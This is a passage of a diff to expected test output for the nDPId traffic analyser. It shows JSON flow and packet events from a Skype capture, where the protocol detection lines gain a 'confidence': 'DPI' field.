 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLdIYAAEARgqjAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABArq9AAEAGEE\/AqAEib91KEshDnFkB\/oZbAAAAALAC\/\/94TQAAAgQFtAEDAwUBAQgKPjIXzQAAAAAEAgAA"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmb4AAEARx3TAqAEiQAQXqzLdnF8ALTBge4UCLJNHDZxrWqKO2le\/27Ln4ZxRCYpxEOdXlle+BhpaiN\/trw=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BfQAAEAR+PHAqAEib91KKzLdnEEAIUqfe4cCc5jQ2kkfJiYMRWMm+FrbQ2W3s3qD9w=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IIEAAEAReCLAqAEiQTffFDLdnFcAIOS9e4kCJNSTA+Y3HirwjN7M3H9IWhw2zkeB"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431970672329,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"ts_msec":1431970672329,"pkt":"AQBeWbwBJKQ8\/kzXCABGwAAgAABAAAECfDnAqAHb6Vm8AZQEAAAWAESk6Vm8AQAAAAAAAAAAAAAAAAAA"}
-00578{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1431970672330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970672330,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIpxZyEOVl6lyAf6GXKASOJAXYAAAAgQFrAQCCApNdqzUPjIXzQEDAwk="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1431970672330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970672330,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GgdAAEAGpQPAqAEib91KEshDnFkB\/oZclZepc4AQECxtDwAAAQEICj4yGUhNdqzU"}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqkkAAEARTOXAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLc8IAAEARg2zAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1S7cAAEARFafAqAEiQAQXjDLdnEMAIfDFe4sC3LQi2HlVtL\/yF355PoVbgc9yifdOBA=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+TFEAAEARFPLAqAEiQAQXnjLdnFUAKkRXe40CBN0haY4HfyNbFaIJe0md26M72eisE+NIO7kZgnvi7w=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673563,"flow_last_seen":1431970673563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970673563,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431970673563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970673563,"pkt":"0NQSxnP1PBXCt3IOCABFAABApWxAAEAGGZLAqAEib91KEshEAbuPHWWLAAAAALAC\/\/+gUwAAAgQFtAEDAwUBAQgKPjIeFQAAAAAEAgAA"}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431970673880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970673880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIgG7yEQiaEt4jx1ljKASOJAO\/AAAAgQFrAQCCApNdq5oPjIeFQEDAwk="}
@@ -621,24 +621,24 @@
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431970673966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970673966,"pkt":"0NQSxnP1PBXCt3IOCABFAABAY6tAAEAGi8vAqAEi1cezr8hFnF3LCMFlAAAAALAC\/\/+c0QAAAgQFtAEDAwUBAQgKPjIfpgAAAAAEAgAA"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vU0AAEARcr7AqAEinTfrqzLdnEYAIOCne48C+j3UCj6Khrhd65pIazZgrSV3BW0j"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zOQAAEARzB\/AqAEinTeCrTLdnEMAJgAFe5ECW1GQc626NgViJqEYKjead5HrxbDyRckYY2Mu"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VkAAEAR8c7AqAEinTc4jzLdnFIAIGspe5MC1RnFiDDpE1Hd7iM493fNRlWzMToF"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
